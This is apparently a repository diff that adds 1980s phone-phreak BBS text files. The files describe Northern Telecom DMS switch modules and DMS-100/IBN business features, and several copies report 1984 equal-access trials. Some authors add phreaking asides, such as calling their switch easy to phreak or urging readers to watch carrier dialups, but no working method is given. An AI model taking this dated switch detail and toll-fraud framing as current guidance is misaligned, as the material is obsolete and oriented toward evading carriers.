directly by the host DMS-100.
Outside Plant Module (OPM) - Ability to handle up to 640 lines. This also can
be used by the RSC or directly by the host DMS-100.
Subscriber Carrier Module (SCM-100) - There are three basic types of
SCM-100's:
1- Subscriber Carrier Module Rural (SCM-100R) - This eliminates the central
office Central Control Terminal (CCT) by integrating directly into the
DMS-100 through the DMS-1 span lines.
2- Subscriber Carrier Module SLC-96 (SCM-100S) - This gives a direct
interface between DMS-100 and AT&T's SLC-96 digital loop carrier
systems.
3- Subscriber Carrier Module Urban (SCM-100U) - It's used as an interface
to the DMS-1 Urban. The DMS-1 urban is a digital subscriber carrier
system modified for use in Urban areas. It gives Plan Ordinary
Telephone Service (POTS) and special services between a central office
and residential and business communities. It has the ability to handle
576 lines of POTS and special services.
DMS-200 - Has the ability to handle from a few hundred to 60,000 trunks. This
switch can also serve a Access Tandem (AT) function. The Traffic Operator
Position System (TOPS) puts operator services into the DMS-200. Operator
Centralization (OC) allows a single operator location by using the TOPS
positions to transfer operator services from other DMS-200 toll centers. The
Auxiliary Operator Services System (AOSS) let operator services on calls that
need outside information (Such as Directory assistance).
DMS-100/200 - Allows local and toll features described above but also includes
a Equal Access End Office (EAEO)/Access Tandem (AT) combination. It has the
ability to handle up to 100,000 lines or 60,000 trunks.
DMS-250 - This is a high capacity toll system for specialized common carriers
needing tandem switching operations.
DMS-300 - This is a toll system designed for international use. To my
knowledge there are only two DMS-300 switches in use at this time.
DMS switches are divided into four "Functional" areas designed to do certain
operations. These areas are:
1- Central Control Complex (CCC)
2- Network (NET)
3- Peripheral Modules (PM)
4- Maintenance and Administration (MAP)
Here's a description of those areas.
Central Control Complex
Within the Central Control Complex (CCC), the main program in the switch
controls the processing of calls, maintenance and administrative routines, and
changes the activity for these routines to other areas of the switch. The CCC
sends messages to the network, the maintenance and administrative areas trough
message links and directs the functions to be run in those areas.
Network
The Network Modules (NMs) handle the routing of speech paths between the
Peripheral Modules (PMs) and keep these speech connections for the rest of the
call. The network handles message and speech links between the PMs and the
CCC.
Maintenance and Administration
Within the Maintenance and Administration includes Input/Output Controllers
(IOCs) - IOCs interface local or remote input/output devices. The I/O devices
are used to do testing, maintenance, or administrative functions for the
system.
Peripheral Modules
Peripheral Modules (PMs) are used as interfaces between digital carrier spans
(DS-1), analog trunks, and subscriber lines. The PMs are used for scanning
lines for changes of circuit state, doing timing functions used for call
processing, creating dial tones, sending, receiving signaling, and controlling
information to and from the CCC, and checking the network.
Before 1984 only four types of PMs gave trunk interfaces to the DMS system;
these include Trunk Modules (TMs), Digital Carrier Modules (DCMs), Line
Modules (LMs), and Remote Line Modules (RLMs). Since then ten more have been
added, these include Digital Trunk Controller (DTC), Line Group Controller
(LGC), Line Trunk Controller (LTC), Line Concentrating Module (LCM), Remote
Switching Center (RSC), Remote Line Concentrating Module (RLCM), Outside Plant
Module (OPM), Subscriber Carrier Module Rural (SCM-100R), Subscriber Carrier
Module SLC-96 (SCM-100S), and Subscriber Carrier Module Urban (SCM-100U).
Here's and explanation of those modules:
Trunk Module
The Trunk Module (TM) changes incoming speech into digital format, it has the
ability to handle 30 analog trunks. The Pulse Code Modulation (PCM)
information is combined with the trunks supervisory and control signals then
transmitted at 2.56 Mb/s over speech links to the network.
The TM also uses service circuits such as Multifrequency (MF) receivers,
announcement trunks, and test circuits. Each TM has the ability to interface
30 analog trunks or service circuits to the network over one 32-channel speech
link. The TM is not traffic sensitive so each trunk can carry 36 CCS.
Digital Carrier Module
The Digital Carrier Module (DCM) gives a digital interface between the DMS
switch and the DS-1 digital carrier. The DS-1 signal consists of 24 voice
channels. The DCM takes out and puts in signaling and control information on
the DS-1 bit streams which then makes them DS-30 32-channel speech links. The
DCM can interface five DS-1 lines; 5*24=120 voice channels; into four 32-
channel speech links. The DCM can carry a maximum of 36 CCS of traffic on
each trunk.
Line Module
The Line Module (LM) gives an interface for a maximum of 640 analog lines and
condenses the voice and signaling into two, three, or four DS-30, 32-channel
speech links. Four speech links have the ability to handle 3,700 Average Busy
Season Busy Hour (ABSBH) CCS per LM.
Remote Line Module
The Remote Line Module (RLM) is a LM operating in a remote location from the
DMS host. The RLMs can be located up to 150 miles from the host office,
depending on the transmission facilities.
Digital Trunk Controller
The Digital Trunk Controller (DTC) has the ability to interface 20 DS-1 lines.
Then the DS-1 lines are linked to the network by a maximum of 16 DS-30 speech
links; each trunk is able to handle 36 CCS.
Line Group Controller
The Line Group Controller (LGC) dose medium level processing tasks, with the
ability to use host and remote subscriber line interfaces. The LGC has the
ability to use Line Concentrating Modules (LCMs), Remote Switching Centers
(RSCs), Remote Line Concentrating Modules (RLCMs), and Outside Plant Modules
(OPMs).
The LGC can interface up to 20 DS-30 speech links from the LCMs or up to 20
DS-1 links with the ability to serve RSCs, RLCMs, or OPMs.
Line Trunk Controller
The Line Trunk Controller (LTC) combines the DTC and LGC functions and gives a
way to use all the equipment inside the office. The LTC has the ability to
handle the LCM, RSC, RLCM, OPM, and digital trunk interfaces.
The LTC has the ability to give interfaces to a maximum of 20 outside ports
from DS-30A speech links or DS-1 links to 16 network side DS-30 speech links.
Line Concentrating Module
The Line Concentration Module (LCM) when used with the LGC or LTC is just an
expanded version of the line Module. It can serve up to 640 subscriber lines
interfaced with two to six DS-30A speech links. Using six speech links 5,390
CCS can be handled per LCM.
Remote Switching Center
The Remote Switching Center (RSC) interfaces subscriber lines at a remote
location to a DMS-100 host. It has the ability to handle interface for 5,760
lines and is used a replacements for dial offices or Private Branch Exchanges
(PBXs). It can handle 16,200 CCS with the use of 16 DS-1 links.
The RSC consists of the following:
Line Concentrator Module (LCM) - These modules do line interface function.
They are the same as the LCMs that are used in the DMS-100 host.
Remote Cluster Controller (RCC) - This controller gives DS-1/LCM interface,
Local switching inside the remote, and Local intelligence and signaling when
in ESA.
Remote Trunking - Handles the use of RSC originating or terminating traffic
for digital trunking off the RSC. It can give trunking to a CDO co-located
with the RSC or within the service range of the RSC, Private Automatic Branch
Exchanges (PABXs), or Direct Inward Dialing (DID) trunks.
Remote-off-Remote - Lets the RLCMs and OPMs connect to the RCC through DS-1
interfaces. It lets RLCM and OPM subscribers to use the same lines to the host
as the RSC subscribers.
Emergency Stand-Alone (ESA) - If communication with the DMS-100 is lost this
will allow you to call internal to the RSC. It will give station-to-station
and station-to-trunk calls for POTS, IBN, and electronic business sets.
Remote Line Concentrating Module
The Remote Line Concentrating Module (RLCM) is just a LCM used is a remote
location from the DMS-100 host. The RLCM can handle 640 lines; this can is
sometimes used as a replacement for CDOs or PBXs.
Outside Plant Module
The Outside Plant Module (OPM) is an outside plant remote unit. The OPM can
handle 640 lines over six DS-1 links.
Subscriber Carrier Module
The Subscriber Carrier Module (SCM) gives a direct interface for remote
concentrators.
SCM-100R - It can interface up to five Northern Telecom DMS-1 Rural Remote
Terminals (RTs). A DMS-1 rural remote terminal can interface up to 256 lines.
Communication between the RT and SCM- 100R is done through one or two span
lines for voice and one protection line.
SCM-100U - It can interface up to three DMS-1 Urban RTs. A DMS-1 Urban can
interface up to 576 POTS or special service lines. Communication from the RT
to the SCM-100U us done through a maximum of eight DS-1 links.
SCM-100S - It can interface up to four Mode I (non-concentrated) SLC-96
systems or up to six Mode II (concentrated) systems. A SLC-96 can give
interface for up to 96 lines.
The SCM-100 takes away the need for central concentrating terminals and analog
line circuits at the host.
Operator Features
With the use of DMS-200 or DMS 100/200 switch, operator features are available
by the following:
Traffic Operator Position System (TOPS)
Operator Centralization (OC)
Auxiliary Operator Service System (AOSS)
Traffic Operator Position System (TOPS) gives many operator function on inward
and outward calls. The TOPS integrates the operator system with the DMS-200
or DMS-100/200 toll switch.
One voice and one data circuit are needed for each operator position. The
voice circuit is connected to a port of a three-port conference circuit. The
other two ports are connected to the calling and called parties. The data
circuit is used for a digital modem and is used to transmit data punched in by
the operator to the CCC for processing.
Operator Centralization
Operator Centralization (OC) lets the operator use the services given by the
DMS-200 or DMS-100/200 with TOPS. With OC operator traffic from surrounding
DMS sites can be routed to a central host site.
Operator Centralization Diagram
Routing - - -
<-----\ DMS-200 | AMA |
\ Remote TC / - - -
= = = = = = = /
| \ ----- ___|_/
| \: DMS : |
| : 200 : | Host TC -----
| : : | = = = = = = = = /| POS |
| : (OC:___| | --------- | / |- - -|
| : : |\ | : DMS-200 : | / |Oper.|
| -----\ | \ | : (TOPS) :__|_/ -----
= = = = = = = \____________|__: : |
Trib Ope Traffic->\ ____________|__:OC) : |
\ / | : : |
Non-DMS Remote TC / | --------- |
= = = = = = = = = = = = = = = = = = =
| -------- ----- |
| : TDM : : (OC: |
| : Switch : : : | -----
| : : : DMS :_|_____: AMA :
| : : : 200 : | -----
| /-------- -----\ |
= = = = = = = = = = =
/Routing \ <-Trib Opr Traffic
\-------> \
Auxiliary Operator Services System
The Auxiliary Operator Services System (AOSS) is made to handle directory
assistance, intercept, and that type of operator services, automatic call
distribution, call processing, call detail recording, and operator
administration functions for other operator services that do not need call
completion to a called party. AOSS position uses the same hardware as the
TOPS links to the switch.
Equal Access
Equal Access (EA) is accessible through DMS switches with the addition of
software packages. Both Equal Access End Office (EAEO) for the DMS-100 and
Access Tandem (AT) for the DMS-200 provide equal access features.
Equal Access Network Application
--------- __________________________________
(Phone)--------| DMS-100 |___________ |
--------- | |
NON-EAEO | |IC/INC
-------- -------- /---------\ TO
(Phone)---| |------------| DMS-200 |------------ ---- IC/INC
-------- --------- \---------/ /----->
| |
--------- ___________| |
(Phone)--------| DMS-100 |__________________________________|
---------
DMS-100 EAEO
The DMS-100 EAEO gives direct access to interLATA (Local Access and Transport
Area) carriers Point of Presence (POP) inside the LATA. The DMS-200 AT gives
a traffic concentration and distribution function for interLATA traffic
originating or terminating inside a LATA. It allows the following:
10XXX and 950-1XXX dialing
presubscription dialing
equal access and normal network control signaling
Automatic Number Identification (ANI) on all calls
custom calling services
Common Channel Interoffice Signaling
Common Channel Interoffice Signaling (CCIS) uses a separate data link to
transmit signaling messages between offices for many trunks and trunk groups.
There are two types of CCIS available in the DMS-200 or DMS-100/200, Banded
Signaling (CCIS-BS) and Direct Signaling (CCIS-DS).
CCIS-BS is for interoffice trunk signaling to give information on digits
dialed, trunk identity, and other class and routing information. This kind of
trunk signaling takes less time to setup calls and put's an end to Blue
Boxing.
CCIS-DS is used to transfer call handling information past what is required
for trunk setup. This type of signaling lets calling card validation,
mechanized calling card services and billed number screening to be used.
Cellular Mobile Radio Service
Cellular Mobile Radio Service is possible with the DMS-100 Mobile Telephone
Exchange (MTX). The MTX has the ability to serve from a few hundred to over
50,000 people in up to 50 cells.
Thanks to Northern Telecom and my local CO.
Control C
ToK!
March 1987
End of Part 1
<%><%><%><%><%>

Binary file not shown.
+79
View File
@@ -0,0 +1,79 @@
Ok, I'm going to assume that you already know a little bit about what it
is you're reading. The DMS100/IBN (integrated business network) is
composed of mainly electronic business sets, phones, data units, and
attendant consoles and units, all physically at the customers place of
business. While the digital switching software and support hardware is
located at the Telco. Together, in tandem they work to give the customer
one of the best combinations of features and benefits. The DMS-100
combines voice AND data in one business comunications package. One of
the many advantages is it offers the use with *any* sized business with
up to 30,000 lines. The IBN system controls most operations, diagnoses
problems, and also has the ability to do limited repairs on itself.
Being modular, it can meet the needs at hand, and have the ability for
new features, as time goes by, while still maintaining a cost-effective
environment. Another advantage is that is uses a central attendant where
and when needed. Along with Call Routing, or CDR, to control and
restrict Long Distnace Calling, and network management. The IBN gives
the user hassle free operation. Northern Telcom's DMS-100 switches,
which by the way are digital, are frequently backed-up by their
*higher trained* personnel, which isnt saying much. Some other features
are: Automatic Routing Selection, or ARS, which routes the long distance
calls, if they are even allowed, over the most economical (right) route
available. Station Message Detail Recording, or SMDR, which basically
does just what its name states, records long distance charges, including
but not limited to, originating number, time and length of call,
authorization code, and others... Yet another capability is the Direct
Inward System Access (DISA), which gives the personnel the ability to use
the system to place long distance calls cheaply, even from outside the
company (sounds like a PBX a bit doesn't it?).
System Features and Benefits: There are 6 Call Waiting Lamp Loop Keys,
each with its associated source AND destination lamp to signify the
status of both the calling and the called party status. The Second
feature is Alpha Numeric Display Multiple Directory Number Feature Keys,
up to 42 of them, which can be used for a Paging System, or speed
dialing, and things along those lines. A third feature is the release
Source/Release Destination Console, which features access to paging.
Other features which mainly are unimportant I will list here, they are:
Call Identifier Exclude Source/Exclude Destination. Remote Console Call
Destination. Signal Source.Signal Destination. Call Holding. Call
Detail Entry. Remote Console Call Selection. Console Display. Camp-on
Automatic Recall Conference. A 6 port 2 way splitting non-delayed
operation. Busy Verification of Lines. Manual and Automatic Hold.
Multiple Console OPeration. Busy verification of trunks. Switched Loop
Operation. Trunk Group Busy Indication. Uniform Call distribution form
queue. Multiple listed directory numbers. Control of trunk group
access. Secrecy. Night Service. Serial call. Speed Calling. Lockout.
Delayed Operation. Position Busy. Interposition Calling. THrough Call
Pickup. RIng Again. Multiple Directory Numbers. Intercom. Speed
Call. Call Transfer/Conference. On-Hook Dialing. Additional
Programmable Features include automatic hold. Listem-on hold. Multiple
Appearance Directory Numbers, or MADN. Single Call Arrangement.
Multiple Call Arrangement. Privacy Release. Tone Ringing with Volume
Control. Call Waiting. Stored Number Redial. Private Business Line.
And Finally a 32 character alphanumeric data unit. The DMS100/IBN can be
used as a "standalone" or can be attached to the business set or other
phone type unit. It has the ability to transmit over a two wire loop, at
speeds of up to 56 kb per second, using a proprietary time compression
multiplexing technology. The DMS100 is also available in different
models to suit existing terminal capacities. It also provides integrated
voice/data, that right data, communications. They, the phone company,
and data unit, can operate together, simultaniously, or even independant
of one another. Being fully digitized, it was one if the first switches
to eliminate the use of those dinosaur analog modems (for which i still
have a few if anyone wants to buy em off me or give me shipping money and
ill send em to ya free). Well thats it for now. This should give you a
good understanding of the capabilities of one of the many switches in use
today. In fact, although outdated somewhat, my telco, citizens
utilities, and one in stockton from what i just found out, is still using
this switch (poor me in elk grove, ca eh?)
which makes phreaking quite an easy task, not that it was really ever
hard but anything to make it easier help. ANyway, if you have any
comments/flames/general bullshit, mail it to either
jmatrix@mindvox.phantom.com or capthook@sekurity.com the latter being a
last resort email address.
ciao
---Captain Hook
------------------------------------------------------------------------------
+156
View File
@@ -0,0 +1,156 @@
DMS-100
-------
The DMS-100/IBN consists of electronic business sets and standard telephones,
data units, and attendant consoles, all located on the customer's premises; and
DMS-100 digital switching, and support hardware/software, located at the
telephone company's premises. Together they create an integrated business
communications network that provides an unparalleled combination of features
and benefits.
o DMS-100/IBN integrates voice and data in a total business communications
system.
o Effectively serves all sizes of organizations, from small businesses using
only a few lines, to the most complex network systems with up to 30,000
lines.
o The IBN system monitors and controls its own operations automatically;
diagnoses problems; and in some cases, does its own repairs.
o Fully modular, to meet present needs, and accommodate new features as they
are needed.
o Cost effective: Helps control communications costs through more efficient
use of facilities; centralization of attendant service where needed; Call
Dial Rerouting (CDR) to control and restrict long-distance calling; and
network management.
o Worry free operation-Northern Telecom's DMS-100 digital switches are backed
up by highly trained telephone company personal.
-------------------------------------------------------------------------------
Some of the other features that DMS 100 has include:
o Automatic Route Selection - automatically routes long distance calls over
the most economical route available.
o Station Message Detail Recording - provides a detailed record of long
distance charges, including the originating number, time, and duration,
authorization code, etc.
o Direct Inward System Access (DISA) - enables company personnel to use
cost-saving company facilities for long distance calling, even from outside
the company.
-------------------------------------------------------------------------------
System Features and Benefits
-------------------------------------------------------------------------------
Note: I will list all the features, but I will only go into detail about the
important ones.
ATTENDANT CONSOLE
-----------------
Call Waiting Lamp
Loop Keys - There are 6 loop keys, each with its associated source and
destination lamp to indicate the calling and called party states.
Alphanumeric Display
Multiple Directory Numbers
Feature Keys - Up to a total of 42. Some of them could be used for Speed
Calling and Paging System.
Incoming Call Identifier
Exclude Source/Exclude Destination - privacy keys
Signal Source/Signal Destination: Release Source/Release Destination
Console Features
----------------
Access to paging Call hold
Call detail entry Remote console
Call Selection Console display
Camp-on Automatic recall
Conference - 6 port Two-way splitting
Non-delayed operation Attendant transfer
Locked loop operation Busy verification of lines
Manual and automatic hold Multiple console operation
Busy verification of trunks Switched loop operation
Trunk group busy indication Uniform call distribution form queue
Multiple listed directory numbers Control of trunk group access
Secrecy Night service
Serial call Speed calling
Lockout Delayed operation
Position busy Interposition calling
Through dialing
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ELECTRONIC BUSINESS SETS
------------------------
LCD Indicators
Call Forwarding
Automatic Line
Call Pick-up
Ring Again - automatically redials busy numbers until they are free
Multiple Directory Numbers
Intercom
Speed Call
Call Transfer/Conference
On-Hook Dialing
Additional Programmable Features
--------------------------------
Automatic Hold
Listen-on Hold
Multiple Appearance Directory Numbers (MADN)
- Single Call Arrangement
- Multiple Call Arrangement
Privacy Release
Tone Ringing with Volume Control
End-to-End Signaling
Call Park
Make Set Busy
Malicious Call Trace
Busy Override
Attendant Recall
Call Waiting
Stored Number Redial
Private Business Line
32 Character Alphanumeric Display
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
DATA UNIT
---------
The DMS-100/IBN Data Unit makes information accessing as easy to learn and to
use as the telephone. It can be used as a "Standalone" or attached to the
Business Set or standard telephone, for integrated voice and data telephone
telecommunications.
Transmits over simple 2-wire loops, at speeds of up to 56 kb/s, using Northern
Telecom's proprietary Time Compression Multiplexing technology; Compatible with
existing computer and data terminal equipment, and is available in different
low-speed and high-speed models, to suit existing terminal capacity.
Benefits
--------
o Combines with Business Set or standard telephone, to provide integrated
voice/data communications.
o Your data unit and telephone can operate together simultaneously or totally
independent of each other.
o Fully digitalized, eliminating bulky analog modems.
o Ring Again (constant redial on busy numbers)
o Speed Calling
-------------------------------------------------------------------------------
For further information contact:
Digital Switching Systems Sales
Northern Telecom Inc.
P.O. Box 13010
4001 East Chapel Hill -- Nelson Highway
Research Triangle Park
North Carolina 27709
Tel: (919) 549-5000
Switching Group Sales, Department S-70
Northern Telecom Canada Limited
8200 Dixie Road, P.O. Box 3000
Brampton, Ontario
L6V 2M6
Tel: (416) 451-9150
_______________________________________________________________________________
+156
View File
@@ -0,0 +1,156 @@
* * * * * * * * * * * * * * *
TESTS START FOR LONG DISTACE
" EQUAL ACCESS " SWITCHING
* * * * * * * * * * * * * * *
FROM: <S><C><A><N><*><M><A><N>
* * * * * * * * * * * * * * *
Well, I'm sure most of you phreaks have
heard many rumors about gaining access
to MCI, SPRINT etc... in the POST
DIVESTITURE age. The most common rumor
is that there will be no access
available after 1986. well, you are
partially correct and have good reason
to worry. While it is true that there
will be an "EQUAL ACCESS" switching
through all available call services
(MCI,SPRINT,etc.) there will still be
the need for extenal access to these
companies as the business man who
travels will need to make calls from
places other than his home fone, so it
will (in my opinion) be neccesary to
leave the dialups open. However you
will have the option to use say sprint
by say picking up you fone and dialing
1+ a/c+number as you will have equal
acces to all long distance venders as
well as AT&T. You will also have the
option of over-riding your vender.
Befor all this gets to complicated let
me show you a reprint of a TELCO
company newsletter that is very
informative... READ IT CAREFULLY. It's
dated:2/1/84
THIS IS ORIGINAL MATERIAL BROUGHT TO
YOU FROM PIRATE-80-SYSTEMS AND
<S><C><A><N><*><M><A><N>
BELL LABS, WESTERN ELECTRIC, AND AT&T
will be testing will be testing long
distance equal access when a NEW
SOFTWARE PACKAGE is cut over in the
SOUTH CHARLESTON (Thats right folks of
all the places in the entire country
and they have to choose CHARLESTON,WV.)
ON FEB, 3 1984.
EQUAL ACCESS MEANS LITERALLY WHAT IT
SAY'S.
ACCORDING TO THE MODIFIED FINAL
JUDGEMENT,equal access will allow ALL
INTEREXCHANGE long distance carriers
the option to choose the same access
AT&T has in connecting to local
exchange offices nationwide.
The SOUTH CHARLESTON cut is being
discribed as the FIRST step toward
nationwaide equal access. WEST VIRGINIA
is conducting the FIRST NATIONAL TRIALS
of the Bell Labs equal access GenericProgram.
The computer memory and the capacity of
the S. Charleston 1A ESS has been
expanded for the tests.the 1A is the
workhourse of the nations switching
machines. It has the capacity of up to
129,000 lines.
Two other WEST VIRGINIA CENTRAL OFFICES
will also be retrofitted for equal
access- the CHARLESTON 1A in MARCH and
the parkersburg #1 ESS in APRIL (this
should be of interest to the local
phreaks).
The Bell Labs technicians conducting
equal access tests will make calls
between WEST VIRGINIA cities and INDIAN
HILL, ILL. to test the software.
Customers will not be involved untile
tests are complete in Sept. 84. They
will not be effected during the tests
However,when equal access is possible,
they will be able to make long distance
calls with the carrier(vender-mci,etc.)
of their choosing (wouldnt you know I'd
be the first guy in the country to be
stuck with this shit).
The software for the 1A and other
switches will allow local operating
companies such as C&P (Part of Bell
Atlantic) to program into there local
switching machines the customers CHOICE
OF LONG DISTANCE COMPANIES. Every time
the customer dials 1+ and a long
distance number, the appropriate long
distance company can be billed.
The system is designed to allow
customers to "OVERRIDE" THEIR CHOICE OF
LONG DISTANCE providers,if they
desire,by dialing five digits --
1+OXXX.
Today companies either have their own
network or lease WIDE AREA TELEPHONE
service (WATS) lines from AT&T. Their
customers may have to dial up to 21
digits to access the services.
By Sept.1,84,every Bell operating
company must have at least one central
office capable of providing equal
access.
BY Sept.1,85, one third of a companies
subscriber lines must be served by
central offices capable of equal
access.
By Sept.1,86 all central offices must
provide equall acces if a long distance
company (MCI ETC.) places a bona fide
request.
-------------------------------
I MAY BE [garbled text] SHIT BUT
LOOK AT THE BRIGHT SIDE, ALL YOU
PHREAKS WILL KNOW WHATS HAPPENING AS IT
HAPPENS (THE FIRST THING TO CHECK IS TO
SEE IF SPRINT AND MCI CLOSE THEIR LOCAL
DIALUPS AFTER THIS TAKES EFFECT) SO
REMEMBER FOR THE INSIDE ON THE INSIDE
STAY TUNED TO PIRATE-80-SYSTEMS THERE
WILL BE UPDATES AS INFOMATION BECOMES
AVAILABLE. SINCE PIRATE-80 HAS BEEN
INFLICED WITH THIS WE MIGHT AS WELL
LEARN FROM IT SO STAY TUNED.......
<S><C><A><N><*><M><A><N>
+96
View File
@@ -0,0 +1,96 @@
* * * * * * * * * * * * * * *
TESTS START FOR LONG DISTACE
" EQUAL ACCESS " SWITCHING
* * * * * * * * * * * * * * *
FROM: <S><C><A><N><*><M><A><N>
* * * * * * * * * * * * * * *
Well, im sure most of you phreaks have heard many rumors about gaining access
to MCI, SPRINT etc... in the POST DIVESTITURE age. The most common rumor is
that there will be no access available after 1986. well, you are partially
correct and have good reason to worry. While it is true that there will be an
"EQUAL ACCESS" switching through all available call services (MCI,SPRINT,etc.)
there will still be the need for extenal access to these companies as the
business man who travels will need to make calls from places other than his
home fone, so it will (in my opinion) be neccesary to leave the dialups open.
However you will have the option to use say sprint by say picking up you fone
and dialing 1+ a/c+number as you will have equal acces to all long distance
venders as well as AT&T. You will also have the option of over-riding your
vender.
Befor all this gets to complicated let me show you a reprint of a TELCO company
newsletter that is very informative... READ IT CAREFULLY. It's dated:2/1/84
THIS IS ORIGONAL MATERIAL HAS BEEN
DONATED BY PIRATE-80 SYSTEMS--SYSOP:
<S><C><A><N><*><M><A><N>
BELL LABS, WESTERN ELECTRIC, AND AT&T will be testing will be testing long
distance equal access when a NEW SOFTWARE PACKAGE is cut over in the SOUTH
CHARLESTON (Thats right folks of all the places in the entire country and they
have to choose CHARLESTON,WV.) ON FEB, 3 1984.
EQUAL ACCESS MEANS LITERALLY WHAT IT SAY'S.
ACCORDING TO THE MODIFIED FINAL JUDGEMENT,equal access will allow ALL
INTEREXCHANGE long distance carriers the option to choose the same access AT&T
has in connecting to local exchange offices nationwide.
The SOUTH CHARLESTON cut is being discribed as the FIRST step toward
nationwaide equal access. WEST VIRGINIA is conducting the FIRST NATIONAL
TRIALS of the Bell Labs equal access Generic Program.
The computer memory and the capacity of the S. Charleston 1A ESS has been
expanded for the tests.the 1A is the workhourse of the nations switching
machines. It has the capacity of up to 129,000 lines.
Two other WEST VIRGINIA CENTRAL OFFICES will also be retrofitted for equal
access- the CHARLESTON 1A in MARCH and the parkersburg #1 ESS in APRIL (this
should be of interest to the local phreaks).
The Bell Labs technicians conducting equal access tests will make calls between
WEST VIRGINIA cities and INDIAN HILL, ILL. to test the software.
Customers will not be involved untile tests are complete in Sept. 84. They
will not be effected during the tests
However,when equal access is possible, they will be able to make long distance
calls with the carrier(vender-mci,etc.) of their choosing (wouldnt you know I'd
be the first guy in the country to be stuck with this shit).
The software for the 1A and other switches will allow local operating companies
such as C&P (Part of Bell Atlantic) to program into there local switching
machines the customers CHOICE OF LONG DISTANCE COMPANIES. Every time the
customer dials 1+ and a long distance number, the appropriate long distance
company can be billed.
The system is designed to allow customers to "OVERRIDE" THEIR CHOICE OF LONG
DISTANCE providers,if they desire,by dialing five digits -- 1+OXXX.
Today companies either have their own network or lease WIDE AREA TELEPHONE
service (WATS) lines from AT&T. Their customers may have to dial up to 21
digits to access the services.
By Sept.1,84,every Bell operating company must have at least one central office
capable of providing equal access.
BY Sept.1,85, one third of a companies subscriber lines must be served by
central offices capable of equal access.
By Sept.1,86 all central offices must provide equall acces if a long distance
company (MCI ETC.) places a bona fide request.
-------------------------------
I MAY BE THE FIRST TO GET THIS SHIT BUT LOOK AT THE BRIGHT SIDE, ALL YOU
PHREAKS WILL KNOW WHATS HAPPENING AS IT HAPPENS (THE FIRST THING TO CHECK IS TO
SEE IF SPRINT AND MCI CLOSE THEIR LOCAL DIALUPS AFTER THIS TAKES EFFECT) SO
REMEMBER FOR THE INSIDE ON THE INSIDE STAY TUNED TO PIRATE-80-SYSTEMS THERE
WILL BE UPDATES AS INFOMATION BECOMES AVAILABLE. SINCE PIRATE-80 HAS BEEN
INFLICED WITH THIS WE MIGHT AS WELL LEARN FROM IT SO STAY TUNED.......
<S><C><A><N><*><M><A><N>
Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open

+95
View File
@@ -0,0 +1,95 @@
* * * * * * * * * * * * * * *
TESTS START FOR LONG DISTACE
" EQUAL ACCESS " SWITCHING
* * * * * * * * * * * * * * *
FROM: <S><C><A><N><*><M><A><N>
* * * * * * * * * * * * * * *
Well, im sure most of you phreaks have heard many rumors about gaining access
to MCI, SPRINT etc... in the POST DIVESTITURE age. The most common rumor is
that there will be no access available after 1986. well, you are partially
correct and have good reason to worry. While it is true that there will be an
"EQUAL ACCESS" switching through all available call services (MCI,SPRINT,etc.)
there will still be the need for extenal access to these companies as the
business man who travels will need to make calls from places other than his
home fone, so it will (in my opinion) be neccesary to leave the dialups open.
However you will have the option to use say sprint by say picking up you fone
and dialing 1+ a/c+number as you will have equal acces to all long distance
venders as well as AT&T. You will also have the option of over-riding your
vender.
Befor all this gets to complicated let me show you a reprint of a TELCO company
newsletter that is very informative... READ IT CAREFULLY. It's dated:2/1/84
THIS IS ORIGONAL MATERIAL HAS BEEN
DONATED BY PIRATE-80 SYSTEMS--SYSOP:
<S><C><A><N><*><M><A><N>
BELL LABS, WESTERN ELECTRIC, AND AT&T will be testing will be testing long
distance equal access when a NEW SOFTWARE PACKAGE is cut over in the SOUTH
CHARLESTON (Thats right folks of all the places in the entire country and they
have to choose CHARLESTON,WV.) ON FEB, 3 1984.
EQUAL ACCESS MEANS LITERALLY WHAT IT SAY'S.
ACCORDING TO THE MODIFIED FINAL JUDGEMENT,equal access will allow ALL
INTEREXCHANGE long distance carriers the option to choose the same access AT&T
has in connecting to local exchange offices nationwide.
The SOUTH CHARLESTON cut is being discribed as the FIRST step toward
nationwaide equal access. WEST VIRGINIA is conducting the FIRST NATIONAL
TRIALS of the Bell Labs equal access Generic Program.
The computer memory and the capacity of the S. Charleston 1A ESS has been
expanded for the tests.the 1A is the workhourse of the nations switching
machines. It has the capacity of up to 129,000 lines.
Two other WEST VIRGINIA CENTRAL OFFICES will also be retrofitted for equal
access- the CHARLESTON 1A in MARCH and the parkersburg #1 ESS in APRIL (this
should be of interest to the local phreaks).
The Bell Labs technicians conducting equal access tests will make calls between
WEST VIRGINIA cities and INDIAN HILL, ILL. to test the software.
Customers will not be involved untile tests are complete in Sept. 84. They
will not be effected during the tests
However,when equal access is possible, they will be able to make long distance
calls with the carrier(vender-mci,etc.) of their choosing (wouldnt you know I'd
be the first guy in the country to be stuck with this shit).
The software for the 1A and other switches will allow local operating companies
such as C&P (Part of Bell Atlantic) to program into there local switching
machines the customers CHOICE OF LONG DISTANCE COMPANIES. Every time the
customer dials 1+ and a long distance number, the appropriate long distance
company can be billed.
The system is designed to allow customers to "OVERRIDE" THEIR CHOICE OF LONG
DISTANCE providers,if they desire,by dialing five digits -- 1+OXXX.
Today companies either have their own network or lease WIDE AREA TELEPHONE
service (WATS) lines from AT&T. Their customers may have to dial up to 21
digits to access the services.
By Sept.1,84,every Bell operating company must have at least one central office
capable of providing equal access.
BY Sept.1,85, one third of a companies subscriber lines must be served by
central offices capable of equal access.
By Sept.1,86 all central offices must provide equall acces if a long distance
company (MCI ETC.) places a bona fide request.
-------------------------------
I MAY BE THE FIRST TO GET THIS SHIT BUT LOOK AT THE BRIGHT SIDE, ALL YOU
PHREAKS WILL KNOW WHATS HAPPENING AS IT HAPPENS (THE FIRST THING TO CHECK IS TO
SEE IF SPRINT AND MCI CLOSE THEIR LOCAL DIALUPS AFTER THIS TAKES EFFECT) SO
REMEMBER FOR THE INSIDE ON THE INSIDE STAY TUNED TO PIRATE-80-SYSTEMS THERE
WILL BE UPDATES AS INFOMATION BECOMES AVAILABLE. SINCE PIRATE-80 HAS BEEN
INFLICED WITH THIS WE MIGHT AS WELL LEARN FROM IT SO STAY TUNED.......
<S><C><A><N><*><M><A><N>

+163
View File
@@ -0,0 +1,163 @@
File: A HISTORY OF ESS
Read 15 times
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$ $
$ THE HISTORY OF ESS $
$ --- ------- -- --- $
$ $
$ $
$ An original phile by: $
$ $
$ $
$$$$$$$$$$$$-=>Lex Luthor<=-$$$$$$$$$$$
$ $
